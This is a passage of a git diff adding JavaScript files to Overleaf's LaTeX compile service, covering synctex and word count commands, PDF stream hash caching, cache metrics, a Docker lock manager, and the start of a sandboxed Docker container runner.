'synctex-output' : 'synctex' + const defaultImageName = + Settings.clsi && Settings.clsi.docker && Settings.clsi.docker.image + // eslint-disable-next-line @typescript-eslint/return-await + return await OutputCacheManager.promises.queueDirOperation( + outputDir, + /** + * @return {Promise} + */ + async () => { + try { + await _checkFileExists(directory, 'output.synctex.gz') + } catch (err) { + if ( + err instanceof Errors.NotFoundError && + compileFromClsiCache && + editorId && + buildId + ) { + try { + await downloadOutputDotSynctexFromCompileCache( + projectId, + userId, + editorId, + buildId, + directory + ) + } catch (err) { + logger.warn( + { err, projectId, userId, editorId, buildId }, + 'failed to download output.synctex.gz from clsi-cache' + ) + } + await _checkFileExists(directory, 'output.synctex.gz') + } else { + throw err + } + } + try { + const output = await CommandRunner.promises.run( + compileName, + command, + directory, + imageName || defaultImageName, + timeout, + {}, + compileGroup + ) + return output.stdout + } catch (error) { + throw OError.tag(error, 'error running synctex', { + command, + projectId, + userId, + }) + } + } + ) +} + +async function wordcount(projectId, userId, filename, image) { + logger.debug({ projectId, userId, filename, image }, 'running wordcount') + const filePath = `$COMPILE_DIR/${filename}` + const command = ['texcount', '-nocol', '-inc', filePath] + const compileDir = getCompileDir(projectId, userId) + const timeout = 60 * 1000 + const compileName = getCompileName(projectId, userId) + const compileGroup = 'wordcount' + + if (image && !_isImageNameAllowed(image)) { + throw new Errors.InvalidParameter('invalid image') + } + + try { + await fsPromises.mkdir(compileDir, { recursive: true }) + } catch (err) { + throw OError.tag(err, 'error ensuring dir for wordcount', { + projectId, + userId, + filename, + }) + } + + try { + const { stdout } = await CommandRunner.promises.run( + compileName, + command, + compileDir, + image, + timeout, + {}, + compileGroup + ) + const results = _parseWordcountFromOutput(stdout) + logger.debug( + { projectId, userId, wordcount: results }, + 'word count results' + ) + return results + } catch (err) { + throw OError.tag(err, 'error reading word count output', { + command, + compileDir, + projectId, + userId, + }) + } +} + +function _parseWordcountFromOutput(output) { + const results = { + encode: '', + textWords: 0, + headWords: 0, + outside: 0, + headers: 0, + elements: 0, + mathInline: 0, + mathDisplay: 0, + errors: 0, + messages: '', + } + for (const line of output.split('\n')) { + const [data, info] = line.split(':') + if (data.indexOf('Encoding') > -1) { + results.encode = info.trim() + } + if (data.indexOf('in text') > -1) { + results.textWords = parseInt(info, 10) + } + if (data.indexOf('in head') > -1) { + results.headWords = parseInt(info, 10) + } + if (data.indexOf('outside') > -1) { + results.outside = parseInt(info, 10) + } + if (data.indexOf('of head') > -1) { + results.headers = parseInt(info, 10) + } + if (data.indexOf('Number of floats/tables/figures') > -1) { + results.elements = parseInt(info, 10) + } + if (data.indexOf('Number of math inlines') > -1) { + results.mathInline = parseInt(info, 10) + } + if (data.indexOf('Number of math displayed') > -1) { + results.mathDisplay = parseInt(info, 10) + } + if (data === '(errors') { + // errors reported as (errors:123) + results.errors = parseInt(info, 10) + } + if (line.indexOf('!!! ') > -1) { + // errors logged as !!! message !!! 
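+      // e.g. a (hypothetical) line: "!!! File not found: missing.tex !!!"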
+ results.messages += line + '\n' + } + } + return results +} + +function _isImageNameAllowed(imageName) { + const ALLOWED_IMAGES = + Settings.clsi && Settings.clsi.docker && Settings.clsi.docker.allowedImages + return !ALLOWED_IMAGES || ALLOWED_IMAGES.includes(imageName) +} + +module.exports = { + doCompileWithLock: callbackify(doCompileWithLock), + stopCompile: callbackify(stopCompile), + clearProject: callbackify(clearProject), + clearExpiredProjects: callbackify(clearExpiredProjects), + syncFromCode: callbackify(syncFromCode), + syncFromPdf: callbackify(syncFromPdf), + wordcount: callbackify(wordcount), + promises: { + doCompileWithLock, + stopCompile, + clearProject, + clearExpiredProjects, + syncFromCode, + syncFromPdf, + wordcount, + }, +} diff --git a/services/clsi/app/js/ContentCacheManager.js b/services/clsi/app/js/ContentCacheManager.js new file mode 100644 index 0000000..5457c0d --- /dev/null +++ b/services/clsi/app/js/ContentCacheManager.js @@ -0,0 +1,441 @@ +/** + * ContentCacheManager - maintains a cache of stream hashes from a PDF file + */ + +const { callbackify } = require('node:util') +const fs = require('node:fs') +const crypto = require('node:crypto') +const Path = require('node:path') +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const pLimit = require('p-limit') +const { parseXrefTable } = require('./XrefParser') +const { + QueueLimitReachedError, + TimedOutError, + NoXrefTableError, +} = require('./Errors') +const workerpool = require('workerpool') +const Metrics = require('@overleaf/metrics') + +/** + * @type {import('workerpool').WorkerPool} + */ +let WORKER_POOL +// NOTE: Check for main thread to avoid recursive start of pool. +if (Settings.pdfCachingEnableWorkerPool && workerpool.isMainThread) { + WORKER_POOL = workerpool.pool(Path.join(__dirname, 'ContentCacheWorker.js'), { + // Cap number of worker threads. + maxWorkers: Settings.pdfCachingWorkerPoolSize, + // Warmup workers. 
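+    // (e.g., with an assumed pdfCachingWorkerPoolSize of 4, four threads are
+    // spawned up-front so the first compile pays no worker start-up latency)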
+ minWorkers: Settings.pdfCachingWorkerPoolSize, + // Limit queue back-log + maxQueueSize: Settings.pdfCachingWorkerPoolBackLogLimit, + }) + setInterval(() => { + const { + totalWorkers, + busyWorkers, + idleWorkers, + pendingTasks, + activeTasks, + } = WORKER_POOL.stats() + Metrics.gauge('pdf_caching_total_workers', totalWorkers) + Metrics.gauge('pdf_caching_busy_workers', busyWorkers) + Metrics.gauge('pdf_caching_idle_workers', idleWorkers) + Metrics.gauge('pdf_caching_pending_tasks', pendingTasks) + Metrics.gauge('pdf_caching_active_tasks', activeTasks) + }, 15 * 1000) +} + +/** + * + * @param {String} contentDir path to directory where content hash files are cached + * @param {String} filePath the pdf file to scan for streams + * @param {number} pdfSize the pdf size + * @param {number} pdfCachingMinChunkSize per request threshold + * @param {number} compileTime + */ +async function update({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, +}) { + if (pdfSize < pdfCachingMinChunkSize) { + return { + contentRanges: [], + newContentRanges: [], + reclaimedSpace: 0, + startXRefTable: undefined, + } + } + if (Settings.pdfCachingEnableWorkerPool) { + return await updateOtherEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, + }) + } else { + return await updateSameEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, + }) + } +} + +/** + * + * @param {String} contentDir path to directory where content hash files are cached + * @param {String} filePath the pdf file to scan for streams + * @param {number} pdfSize the pdf size + * @param {number} pdfCachingMinChunkSize per request threshold + * @param {number} compileTime + */ +async function updateOtherEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, +}) { + const workerLatencyInMs = 100 + // Prefer getting the timeout error from the worker vs timing out the worker. + const timeout = getMaxOverhead(compileTime) + workerLatencyInMs + try { + return await WORKER_POOL.exec('updateSameEventLoop', [ + { + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, + }, + ]).timeout(timeout) + } catch (e) { + if (e instanceof workerpool.Promise.TimeoutError) { + throw new TimedOutError('context-lost-in-worker', { timeout }) + } + if (e.message?.includes?.('Max queue size of ')) { + throw new QueueLimitReachedError() + } + if (e.message?.includes?.('xref')) { + throw new NoXrefTableError(e.message) + } + throw e + } +} + +/** + * + * @param {String} contentDir path to directory where content hash files are cached + * @param {String} filePath the pdf file to scan for streams + * @param {number} pdfSize the pdf size + * @param {number} pdfCachingMinChunkSize per request threshold + * @param {number} compileTime + */ +async function updateSameEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, +}) { + const checkDeadline = getDeadlineChecker(compileTime) + // keep track of hashes expire old ones when they reach a generation > N. 
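+  // (e.g. with the maxAge of 5 passed to deleteStaleHashes below, a hash not
+  // seen for five consecutive compiles is deleted and its space reclaimed)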
+ const tracker = await HashFileTracker.from(contentDir) + tracker.updateAge() + checkDeadline('after init HashFileTracker') + + const [reclaimedSpace, overheadDeleteStaleHashes] = + await tracker.deleteStaleHashes(5) + checkDeadline('after delete stale hashes') + + const { xRefEntries, startXRefTable } = await parseXrefTable( + filePath, + pdfSize + ) + + xRefEntries.sort((a, b) => { + return a.offset - b.offset + }) + xRefEntries.forEach((obj, idx) => { + obj.idx = idx + }) + + checkDeadline('after parsing') + + const uncompressedObjects = [] + for (const object of xRefEntries) { + if (!object.uncompressed) { + continue + } + const nextObject = xRefEntries[object.idx + 1] + if (!nextObject) { + // Ignore this possible edge case. + // The last object should be part of the xRef table. + continue + } else { + object.endOffset = nextObject.offset + } + const size = object.endOffset - object.offset + object.size = size + if (size < pdfCachingMinChunkSize) { + continue + } + uncompressedObjects.push({ object, idx: uncompressedObjects.length }) + } + + checkDeadline('after finding uncompressed') + + let timedOutErr = null + const contentRanges = [] + const newContentRanges = [] + const handle = await fs.promises.open(filePath) + try { + for (const { object, idx } of uncompressedObjects) { + let buffer = Buffer.alloc(object.size, 0) + const { bytesRead } = await handle.read( + buffer, + 0, + object.size, + object.offset + ) + checkDeadline('after read ' + idx) + if (bytesRead !== object.size) { + throw new OError('could not read full chunk', { + object, + bytesRead, + }) + } + const idxObj = buffer.indexOf('obj') + if (idxObj > 100) { + throw new OError('objectId is too large', { + object, + idxObj, + }) + } + const objectIdRaw = buffer.subarray(0, idxObj) + buffer = buffer.subarray(objectIdRaw.byteLength) + + const hash = pdfStreamHash(buffer) + checkDeadline('after hash ' + idx) + const range = { + objectId: objectIdRaw.toString(), + start: object.offset + objectIdRaw.byteLength, + end: object.endOffset, + hash, + } + + if (tracker.has(range.hash)) { + // Optimization: Skip writing of already seen hashes. + tracker.track(range) + contentRanges.push(range) + continue + } + + await writePdfStream(contentDir, hash, buffer) + tracker.track(range) + contentRanges.push(range) + newContentRanges.push(range) + checkDeadline('after write ' + idx) + } + } catch (err) { + if (err instanceof TimedOutError) { + // Let the frontend use ranges that were processed so far. + timedOutErr = err + } else { + throw err + } + } finally { + await handle.close() + + // Flush from both success and failure code path. This allows the next + // cycle to complete faster as it can use the already written ranges. 
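+    // (flush persists the hashAge/hashSize maps to .state.v0.json via an
+    // atomic write-then-rename; see HashFileTracker.flush below)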
+    await tracker.flush()
+  }
+  return {
+    contentRanges,
+    newContentRanges,
+    reclaimedSpace,
+    startXRefTable,
+    overheadDeleteStaleHashes,
+    timedOutErr,
+  }
+}
+
+function getStatePath(contentDir) {
+  return Path.join(contentDir, '.state.v0.json')
+}
+
+class HashFileTracker {
+  constructor(contentDir, { hashAge = [], hashSize = [] }) {
+    this.contentDir = contentDir
+    this.hashAge = new Map(hashAge)
+    this.hashSize = new Map(hashSize)
+  }
+
+  static async from(contentDir) {
+    const statePath = getStatePath(contentDir)
+    let state = {}
+    try {
+      const blob = await fs.promises.readFile(statePath)
+      state = JSON.parse(blob)
+    } catch (e) {}
+    return new HashFileTracker(contentDir, state)
+  }
+
+  has(hash) {
+    return this.hashAge.has(hash)
+  }
+
+  track(range) {
+    if (!this.hashSize.has(range.hash)) {
+      this.hashSize.set(range.hash, range.end - range.start)
+    }
+    this.hashAge.set(range.hash, 0)
+  }
+
+  updateAge() {
+    for (const [hash, age] of this.hashAge) {
+      this.hashAge.set(hash, age + 1)
+    }
+    return this
+  }
+
+  findStale(maxAge) {
+    const stale = []
+    for (const [hash, age] of this.hashAge) {
+      if (age > maxAge) {
+        stale.push(hash)
+      }
+    }
+    return stale
+  }
+
+  async flush() {
+    const statePath = getStatePath(this.contentDir)
+    const blob = JSON.stringify({
+      hashAge: Array.from(this.hashAge.entries()),
+      hashSize: Array.from(this.hashSize.entries()),
+    })
+    const atomicWrite = statePath + '~'
+    try {
+      await fs.promises.writeFile(atomicWrite, blob)
+    } catch (err) {
+      try {
+        await fs.promises.unlink(atomicWrite)
+      } catch (e) {}
+      throw err
+    }
+    try {
+      await fs.promises.rename(atomicWrite, statePath)
+    } catch (err) {
+      try {
+        await fs.promises.unlink(atomicWrite)
+      } catch (e) {}
+      throw err
+    }
+  }
+
+  async deleteStaleHashes(n) {
+    const t0 = Date.now()
+    // delete any hash file older than N generations
+    const hashes = this.findStale(n)
+
+    let reclaimedSpace = 0
+    if (hashes.length === 0) {
+      return [reclaimedSpace, Date.now() - t0]
+    }
+
+    await promiseMapWithLimit(10, hashes, async hash => {
+      try {
+        await fs.promises.unlink(Path.join(this.contentDir, hash))
+      } catch (err) {
+        if (err?.code === 'ENOENT') {
+          // Ignore already deleted entries. The previous cleanup cycle may have
+          // been killed halfway through the deletion process, or before we
+          // flushed the state to disk.
+        } else {
+          throw err
+        }
+      }
+      this.hashAge.delete(hash)
+      reclaimedSpace += this.hashSize.get(hash)
+      this.hashSize.delete(hash)
+    })
+    return [reclaimedSpace, Date.now() - t0]
+  }
+}
+
+function pdfStreamHash(buffer) {
+  const hash = crypto.createHash('sha256')
+  hash.update(buffer)
+  return hash.digest('hex')
+}
+
+async function writePdfStream(dir, hash, buffer) {
+  const filename = Path.join(dir, hash)
+  const atomicWriteFilename = filename + '~'
+  try {
+    await fs.promises.writeFile(atomicWriteFilename, buffer)
+    await fs.promises.rename(atomicWriteFilename, filename)
+  } catch (err) {
+    // clean up the temp file, then surface the original error either way
+    try {
+      await fs.promises.unlink(atomicWriteFilename)
+    } catch (_) {}
+    throw err
+  }
+}
+
+function getMaxOverhead(compileTime) {
+  return Math.min(
+    // Adding 10s to a 40s compile time is OK.
+    // Adding 1s to a 3s compile time is OK.
+    Math.max(compileTime / 4, 1000),
+    // Adding 30s to a 120s compile time is not OK, limit to 10s.
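+    // worked examples (assuming a 10s Settings.pdfCachingMaxProcessingTime):
+    //   compileTime 40s  -> max(10s, 1s) = 10s -> min(10s, 10s) = 10s
+    //   compileTime 3s   -> max(0.75s, 1s) = 1s
+    //   compileTime 120s -> max(30s, 1s) = 30s -> capped at 10s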
+    Settings.pdfCachingMaxProcessingTime
+  )
+}
+
+function getDeadlineChecker(compileTime) {
+  const timeout = getMaxOverhead(compileTime)
+
+  const deadline = Date.now() + timeout
+  let lastStage = { stage: 'start', now: Date.now() }
+  let completedStages = 0
+  return function (stage) {
+    const now = Date.now()
+    if (now > deadline) {
+      throw new TimedOutError(stage, {
+        timeout,
+        completedStages,
+        lastStage: lastStage.stage,
+        diffToLastStage: now - lastStage.now,
+      })
+    }
+    completedStages++
+    lastStage = { stage, now }
+  }
+}
+
+function promiseMapWithLimit(concurrency, array, fn) {
+  const limit = pLimit(concurrency)
+  return Promise.all(array.map(x => limit(() => fn(x))))
+}
+
+module.exports = {
+  HASH_REGEX: /^[0-9a-f]{64}$/,
+  update: callbackify(update),
+  promises: {
+    update,
+    updateSameEventLoop,
+  },
+}
diff --git a/services/clsi/app/js/ContentCacheMetrics.js b/services/clsi/app/js/ContentCacheMetrics.js
new file mode 100644
index 0000000..1e2b598
--- /dev/null
+++ b/services/clsi/app/js/ContentCacheMetrics.js
@@ -0,0 +1,146 @@
+const logger = require('@overleaf/logger')
+const Metrics = require('./Metrics')
+const os = require('node:os')
+
+let CACHED_LOAD = {
+  expires: -1,
+  load: [0, 0, 0],
+}
+function getSystemLoad() {
+  if (CACHED_LOAD.expires < Date.now()) {
+    CACHED_LOAD = {
+      expires: Date.now() + 10 * 1000,
+      load: os.loadavg(),
+    }
+  }
+  return CACHED_LOAD.load
+}
+
+const ONE_MB = 1024 * 1024
+
+function emitPdfStats(stats, timings, request) {
+  if (timings['compute-pdf-caching']) {
+    emitPdfCachingStats(stats, timings, request)
+  } else {
+    // How much bandwidth will the pdf incur when downloaded in full?
+    Metrics.summary('pdf-bandwidth', stats['pdf-size'], request.metricsOpts)
+  }
+}
+
+function emitPdfCachingStats(stats, timings, request) {
+  if (!stats['pdf-size']) return // double check
+
+  if (stats['pdf-caching-timed-out']) {
+    Metrics.inc('pdf-caching-timed-out', 1, request.metricsOpts)
+  }
+  if (timings['pdf-caching-overhead-delete-stale-hashes'] !== undefined) {
+    Metrics.summary(
+      'pdf-caching-overhead-delete-stale-hashes',
+      timings['pdf-caching-overhead-delete-stale-hashes'],
+      request.metricsOpts
+    )
+  }
+
+  // How much extra time did we spend in PDF.js?
+  Metrics.timing(
+    'compute-pdf-caching',
+    timings['compute-pdf-caching'],
+    1,
+    request.metricsOpts
+  )
+
+  // How large is the overhead of hashing up-front?
+  const fraction =
+    timings.compileE2E - timings['compute-pdf-caching'] !== 0
+      ? timings.compileE2E /
+        (timings.compileE2E - timings['compute-pdf-caching'])
+      : 1
+  if (fraction > 1.5 && timings.compileE2E > 10 * 1000) {
+    logger.warn(
+      {
+        stats,
+        timings,
+        load: getSystemLoad(),
+      },
+      'slow pdf caching'
+    )
+  }
+  Metrics.summary(
+    'overhead-compute-pdf-ranges',
+    fraction * 100 - 100,
+    request.metricsOpts
+  )
+
+  // How does the hashing scale to pdf size in MB?
+  Metrics.timing(
+    'compute-pdf-caching-relative-to-pdf-size',
+    timings['compute-pdf-caching'] / (stats['pdf-size'] / ONE_MB),
+    1,
+    request.metricsOpts
+  )
+  if (stats['pdf-caching-total-ranges-size']) {
+    // How does the hashing scale to total ranges size in MB?
+    Metrics.timing(
+      'compute-pdf-caching-relative-to-total-ranges-size',
+      timings['compute-pdf-caching'] /
+        (stats['pdf-caching-total-ranges-size'] / ONE_MB),
+      1,
+      request.metricsOpts
+    )
+    // How fast is the hashing per range on average?
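+    // (i.e. the total compute-pdf-caching time divided by the number of
+    // ranges found in the xref table, stats['pdf-caching-n-ranges'])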
+ Metrics.timing( + 'compute-pdf-caching-relative-to-ranges-count', + timings['compute-pdf-caching'] / stats['pdf-caching-n-ranges'], + 1, + request.metricsOpts + ) + + // How many ranges are new? + Metrics.summary( + 'new-pdf-ranges-relative-to-total-ranges', + (stats['pdf-caching-n-new-ranges'] / stats['pdf-caching-n-ranges']) * 100, + request.metricsOpts + ) + } + + // How much content is cacheable? + Metrics.summary( + 'cacheable-ranges-to-pdf-size', + (stats['pdf-caching-total-ranges-size'] / stats['pdf-size']) * 100, + request.metricsOpts + ) + + const sizeWhenDownloadedInFull = + // All of the pdf + stats['pdf-size'] - + // These ranges are potentially cached. + stats['pdf-caching-total-ranges-size'] + + // These ranges are not cached. + stats['pdf-caching-new-ranges-size'] + + // How much bandwidth can we save when downloading the pdf in full? + Metrics.summary( + 'pdf-bandwidth-savings', + 100 - (sizeWhenDownloadedInFull / stats['pdf-size']) * 100, + request.metricsOpts + ) + + // How much bandwidth will the pdf incur when downloaded in full? + Metrics.summary( + 'pdf-bandwidth', + sizeWhenDownloadedInFull, + request.metricsOpts + ) + + // How much space do the ranges use? + // This will accumulate the ranges size over time, skipping already written ranges. + Metrics.summary( + 'pdf-ranges-disk-size', + stats['pdf-caching-new-ranges-size'] - stats['pdf-caching-reclaimed-space'], + request.metricsOpts + ) +} + +module.exports = { + emitPdfStats, +} diff --git a/services/clsi/app/js/ContentCacheWorker.js b/services/clsi/app/js/ContentCacheWorker.js new file mode 100644 index 0000000..9ecb5b1 --- /dev/null +++ b/services/clsi/app/js/ContentCacheWorker.js @@ -0,0 +1,4 @@ +const workerpool = require('workerpool') +const ContentCacheManager = require('./ContentCacheManager') + +workerpool.worker(ContentCacheManager.promises) diff --git a/services/clsi/app/js/ContentController.js b/services/clsi/app/js/ContentController.js new file mode 100644 index 0000000..96eba61 --- /dev/null +++ b/services/clsi/app/js/ContentController.js @@ -0,0 +1,24 @@ +const Path = require('node:path') +const send = require('send') +const Settings = require('@overleaf/settings') +const OutputCacheManager = require('./OutputCacheManager') + +const ONE_DAY_S = 24 * 60 * 60 +const ONE_DAY_MS = ONE_DAY_S * 1000 + +function getPdfRange(req, res, next) { + const { projectId, userId, contentId, hash } = req.params + const perUserDir = userId ? `${projectId}-${userId}` : projectId + const path = Path.join( + Settings.path.outputDir, + perUserDir, + OutputCacheManager.CONTENT_SUBDIR, + contentId, + hash + ) + res.setHeader('cache-control', `public, max-age=${ONE_DAY_S}`) + res.setHeader('expires', new Date(Date.now() + ONE_DAY_MS).toUTCString()) + send(req, path).pipe(res) +} + +module.exports = { getPdfRange } diff --git a/services/clsi/app/js/ContentTypeMapper.js b/services/clsi/app/js/ContentTypeMapper.js new file mode 100644 index 0000000..5bf0c31 --- /dev/null +++ b/services/clsi/app/js/ContentTypeMapper.js @@ -0,0 +1,38 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
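+// Usage sketch:
+//   ContentTypeMapper.map('paper.pdf') // -> 'application/pdf'
+//   ContentTypeMapper.map('view.html') // -> 'text/plain' (coerced, see below)
+//   ContentTypeMapper.map('data.bin')  // -> 'application/octet-stream'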
+let ContentTypeMapper +const Path = require('node:path') + +// here we coerce html, css and js to text/plain, +// otherwise choose correct mime type based on file extension, +// falling back to octet-stream +module.exports = ContentTypeMapper = { + map(path) { + switch (Path.extname(path)) { + case '.txt': + case '.html': + case '.js': + case '.css': + case '.svg': + return 'text/plain' + case '.csv': + return 'text/csv' + case '.pdf': + return 'application/pdf' + case '.png': + return 'image/png' + case '.jpg': + case '.jpeg': + return 'image/jpeg' + case '.tiff': + return 'image/tiff' + case '.gif': + return 'image/gif' + default: + return 'application/octet-stream' + } + }, +} diff --git a/services/clsi/app/js/DockerLockManager.js b/services/clsi/app/js/DockerLockManager.js new file mode 100644 index 0000000..97804b7 --- /dev/null +++ b/services/clsi/app/js/DockerLockManager.js @@ -0,0 +1,110 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let LockManager +const logger = require('@overleaf/logger') + +const LockState = {} // locks for docker container operations, by container name + +module.exports = LockManager = { + MAX_LOCK_HOLD_TIME: 15000, // how long we can keep a lock + MAX_LOCK_WAIT_TIME: 10000, // how long we wait for a lock + LOCK_TEST_INTERVAL: 1000, // retry time + + tryLock(key, callback) { + let lockValue + if (callback == null) { + callback = function () {} + } + const existingLock = LockState[key] + if (existingLock != null) { + // the lock is already taken, check how old it is + const lockAge = Date.now() - existingLock.created + if (lockAge < LockManager.MAX_LOCK_HOLD_TIME) { + return callback(null, false) // we didn't get the lock, bail out + } else { + logger.error( + { key, lock: existingLock, age: lockAge }, + 'taking old lock by force' + ) + } + } + // take the lock + LockState[key] = lockValue = { created: Date.now() } + return callback(null, true, lockValue) + }, + + getLock(key, callback) { + let attempt + if (callback == null) { + callback = function () {} + } + const startTime = Date.now() + return (attempt = () => + LockManager.tryLock(key, function (error, gotLock, lockValue) { + if (error != null) { + return callback(error) + } + if (gotLock) { + return callback(null, lockValue) + } else if (Date.now() - startTime > LockManager.MAX_LOCK_WAIT_TIME) { + const e = new Error('Lock timeout') + e.key = key + return callback(e) + } else { + return setTimeout(attempt, LockManager.LOCK_TEST_INTERVAL) + } + }))() + }, + + releaseLock(key, lockValue, callback) { + if (callback == null) { + callback = function () {} + } + const existingLock = LockState[key] + if (existingLock === lockValue) { + // lockValue is an object, so we can test by reference + delete LockState[key] // our lock, so we can free it + return callback() + } else if (existingLock != null) { + // lock exists but doesn't match ours + logger.error( + { key, lock: existingLock }, + 'tried to release lock taken by force' + ) + return callback() + } else { + logger.error( + { key, lock: existingLock }, + 'tried to release lock that has gone' + ) + return callback() + } + }, + + runWithLock(key, runner, callback) { + if (callback == null) { + callback = 
function () {} + } + return LockManager.getLock(key, function (error, lockValue) { + if (error != null) { + return callback(error) + } + return runner((error1, ...args) => + LockManager.releaseLock(key, lockValue, function (error2) { + error = error1 || error2 + if (error != null) { + return callback(error) + } + return callback(null, ...Array.from(args)) + }) + ) + }) + }, +} diff --git a/services/clsi/app/js/DockerRunner.js b/services/clsi/app/js/DockerRunner.js new file mode 100644 index 0000000..def02ea --- /dev/null +++ b/services/clsi/app/js/DockerRunner.js @@ -0,0 +1,597 @@ +const { promisify } = require('node:util') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Docker = require('dockerode') +const dockerode = new Docker() +const crypto = require('node:crypto') +const async = require('async') +const LockManager = require('./DockerLockManager') +const Path = require('node:path') +const _ = require('lodash') + +const ONE_HOUR_IN_MS = 60 * 60 * 1000 +logger.debug('using docker runner') + +let containerMonitorTimeout +let containerMonitorInterval + +const DockerRunner = { + run( + projectId, + command, + directory, + image, + timeout, + environment, + compileGroup, + callback + ) { + command = command.map(arg => + arg.toString().replace('$COMPILE_DIR', '/compile') + ) + if (image == null) { + image = Settings.clsi.docker.image + } + + if ( + Settings.clsi.docker.allowedImages && + !Settings.clsi.docker.allowedImages.includes(image) + ) { + return callback(new Error('image not allowed')) + } + + if (Settings.texliveImageNameOveride != null) { + const img = image.split('/') + image = `${Settings.texliveImageNameOveride}/${img[2]}` + } + + if (compileGroup === 'synctex-output') { + // In: directory = '/overleaf/services/clsi/output/projectId-userId/generated-files/buildId' + // directory.split('/').slice(-3) === 'projectId-userId/generated-files/buildId' + // sandboxedCompilesHostDirOutput = '/host/output' + // Out: directory = '/host/output/projectId-userId/generated-files/buildId' + directory = Path.join( + Settings.path.sandboxedCompilesHostDirOutput, + ...directory.split('/').slice(-3) + ) + } else { + // In: directory = '/overleaf/services/clsi/compiles/projectId-userId' + // Path.basename(directory) === 'projectId-userId' + // sandboxedCompilesHostDirCompiles = '/host/compiles' + // Out: directory = '/host/compiles/projectId-userId' + directory = Path.join( + Settings.path.sandboxedCompilesHostDirCompiles, + Path.basename(directory) + ) + } + + const volumes = { [directory]: '/compile' } + if ( + compileGroup === 'synctex' || + compileGroup === 'synctex-output' || + compileGroup === 'wordcount' + ) { + volumes[directory] += ':ro' + } + + const options = DockerRunner._getContainerOptions( + command, + image, + volumes, + timeout, + environment, + compileGroup + ) + const fingerprint = DockerRunner._fingerprintContainer(options) + const name = `project-${projectId}-${fingerprint}` + options.name = name + + // logOptions = _.clone(options) + // logOptions?.HostConfig?.SecurityOpt = "secomp used, removed in logging" + logger.debug({ projectId }, 'running docker container') + DockerRunner._runAndWaitForContainer( + options, + volumes, + timeout, + (error, output) => { + if (error && error.statusCode === 500) { + logger.debug( + { err: error, projectId }, + 'error running container so destroying and retrying' + ) + DockerRunner.destroyContainer(name, null, true, error => { + if (error != null) { + return callback(error) + } + 
DockerRunner._runAndWaitForContainer( + options, + volumes, + timeout, + callback + ) + }) + } else { + callback(error, output) + } + } + ) + + // pass back the container name to allow it to be killed + return name + }, + + kill(containerId, callback) { + logger.debug({ containerId }, 'sending kill signal to container') + const container = dockerode.getContainer(containerId) + container.kill(error => { + if ( + error != null && + error.message != null && + error.message.match(/Cannot kill container .* is not running/) + ) { + logger.warn( + { err: error, containerId }, + 'container not running, continuing' + ) + error = null + } + if (error != null) { + logger.error({ err: error, containerId }, 'error killing container') + callback(error) + } else { + callback() + } + }) + }, + + _runAndWaitForContainer(options, volumes, timeout, _callback) { + const callback = _.once(_callback) + const { name } = options + + let streamEnded = false + let containerReturned = false + let output = {} + + function callbackIfFinished() { + if (streamEnded && containerReturned) { + callback(null, output) + } + } + + function attachStreamHandler(error, _output) { + if (error != null) { + return callback(error) + } + output = _output + streamEnded = true + callbackIfFinished() + } + + DockerRunner.startContainer( + options, + volumes, + attachStreamHandler, + (error, containerId) => { + if (error != null) { + return callback(error) + } + + DockerRunner.waitForContainer(name, timeout, (error, exitCode) => { + if (error != null) { + return callback(error) + } + if (exitCode === 137) { + // exit status from kill -9 + const err = new Error('terminated') + err.terminated = true + return callback(err) + } + if (exitCode === 1) { + // exit status from chktex + const err = new Error('exited') + err.code = exitCode + return callback(err) + } + containerReturned = true + if (options != null && options.HostConfig != null) { + options.HostConfig.SecurityOpt = null + } + logger.debug({ exitCode, options }, 'docker container has exited') + callbackIfFinished() + }) + } + ) + }, + + _getContainerOptions( + command, + image, + volumes, + timeout, + environment, + compileGroup + ) { + const timeoutInSeconds = timeout / 1000 + + const dockerVolumes = {} + for (const hostVol in volumes) { + const dockerVol = volumes[hostVol] + dockerVolumes[dockerVol] = {} + + if (volumes[hostVol].slice(-3).indexOf(':r') === -1) { + volumes[hostVol] = `${dockerVol}:rw` + } + } + + // merge settings and environment parameter + const env = {} + for (const src of [Settings.clsi.docker.env, environment || {}]) { + for (const key in src) { + const value = src[key] + env[key] = value + } + } + // set the path based on the image year + const match = image.match(/:([0-9]+)\.[0-9]+/) + const year = match ? 
match[1] : '2014'
+    env.PATH = `/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/texlive/${year}/bin/x86_64-linux/`
+    const options = {
+      Cmd: command,
+      Image: image,
+      Volumes: dockerVolumes,
+      WorkingDir: '/compile',
+      NetworkDisabled: true,
+      Memory: 1024 * 1024 * 1024 * 1024, // 1024^4 bytes = 1 TiB, i.e. effectively uncapped
+      User: Settings.clsi.docker.user,
+      Env: Object.entries(env).map(([key, value]) => `${key}=${value}`),
+      HostConfig: {
+        Binds: Object.entries(volumes).map(
+          ([hostVol, dockerVol]) => `${hostVol}:${dockerVol}`
+        ),
+        LogConfig: { Type: 'none', Config: {} },
+        Ulimits: [
+          {
+            Name: 'cpu',
+            Soft: timeoutInSeconds + 5,
+            Hard: timeoutInSeconds + 10,
+          },
+        ],
+        CapDrop: 'ALL',
+        SecurityOpt: ['no-new-privileges'],
+      },
+    }
+
+    if (Settings.clsi.docker.seccomp_profile != null) {
+      options.HostConfig.SecurityOpt.push(
+        `seccomp=${Settings.clsi.docker.seccomp_profile}`
+      )
+    }
+
+    if (Settings.clsi.docker.apparmor_profile != null) {
+      options.HostConfig.SecurityOpt.push(
+        `apparmor=${Settings.clsi.docker.apparmor_profile}`
+      )
+    }
+
+    if (Settings.clsi.docker.runtime) {
+      options.HostConfig.Runtime = Settings.clsi.docker.runtime
+    }
+
+    if (Settings.clsi.docker.Readonly) {
